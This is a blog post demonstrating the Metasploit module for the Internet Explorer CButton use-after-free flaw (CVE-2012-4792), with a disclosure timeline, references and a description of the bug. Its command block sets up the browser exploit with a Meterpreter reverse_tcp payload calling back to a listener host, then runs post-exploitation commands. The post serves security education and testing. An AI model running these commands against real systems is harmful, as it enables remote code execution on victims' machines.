Microsoft Internet Explorer CButton Vulnerability Metasploit Demo

Timeline :

CVE reference assigned the 2012-09-06
First samples of the attack discovered in Google cache the 2012-12-07
Vulnerability discovered exploited in the wild on CFE.org around the 2012-12-26
Vulnerability details provided by binjo, Eric Romang and FireEye the 2012-12-29
Microsoft Security Advisory published the 2012-12-30
Metasploit PoC provided the 2012-12-30
Metasploit module name changed the 2012-12-31

PoC provided by :

eromang
mahmud ab rahman
sinn3r
binjo
juan vazquez

Reference(s) :

CVE-2012-4792
MSA-2794220
new IE 0day coming-mshtml!CDwnBindInfo object use after free vulnerability
Attack and IE 0day Informations Used Against Council on Foreign Relations
CFR WATERING HOLE ATTACK DETAILS

Affected version(s) :

nternet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP Pro SP3 with :

Internet Explorer 8

Description :

Note: The module name has change from ie_cdwnbindinfo_uaf to ie_cbutton_uaf

This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that’s controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers.

Commands :

use exploit/windows/browser/ie_cbutton_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid

28 thoughts on “Microsoft Internet Explorer CButton Vulnerability Metasploit Demo

  1. Can you provide me download link of affected internet explorer version on my email id plz

Comments are closed.